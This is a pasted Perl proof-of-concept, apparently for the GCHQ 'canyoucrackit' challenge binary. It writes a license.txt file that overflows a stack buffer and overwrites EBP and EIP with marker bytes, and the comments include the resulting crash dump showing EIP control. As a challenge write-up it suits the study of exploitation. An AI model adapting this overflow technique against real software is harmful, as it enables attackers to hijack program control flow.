Thank you to anyone who has already donated - your generous donations helped make three months of treatment possible.

My brother Nate continues to fight stage IV Hodgkin's lymphoma. He's just 31, with a wife and baby girl. They have no active income (since he's been unable to return to work), no insurance, and cannot afford the treatment he needs. Nate and his family need your help. Please consider a donation, every dollar helps. Thanks.

Read Nate's story Support Nate by buying an official Pastie t-shirt Hide this message

Document@2x
|
Chain_link@2x
|
Arrow_down@2x
|
Spiral_paper@2x
A A A

Perl       Report abuse 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

###
# GCHQ canyoucrackit challenge and vulnerable binary for the win!
# save and run perl poc.pl in the same directory as the GCHQ 
# canyoucrackit executable which can be obtained by visiting 
# the super secret url below.
# 
# URL: http://canyoucrackit.co.uk/da75370fe15c4148bd4ceec861fbdaa5.exe
# the binary will create a stackdump when it crashes. 
# you will need cygwin1.dll and cygcrypt-0.dll to run the binary.
#
# Anyone else catch this? :)))
# 
# PoC just for fun 
# Dillon Beresford
# twitter.com/D1N
###

###
# Exception: STATUS_ACCESS_VIOLATION at eip=44444444
# eax=FFFFFFFF ebx=0022CD50 ecx=611663A0 edx=00000000 esi=0022CD75 edi=00000000
# ebp=42424242 esp=0022CD30 program=C:\Documents and Settings\tester\Desktop\gchq_owned_eip_42424242\da75370fe15c4148bd4ceec861fbdaa5.exe, pid 3364, thread main
# cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
###

my $exploit = "license.txt";

my $junk = "\x41" x 56;
my $ebp = "\x42" x 4;

my $eip = "\x44\x44\x44\x44";

my $payload = $junk.$ebp.$eip;
 
open (myfile,">$exploit");
print myfile $payload;
close (myfile);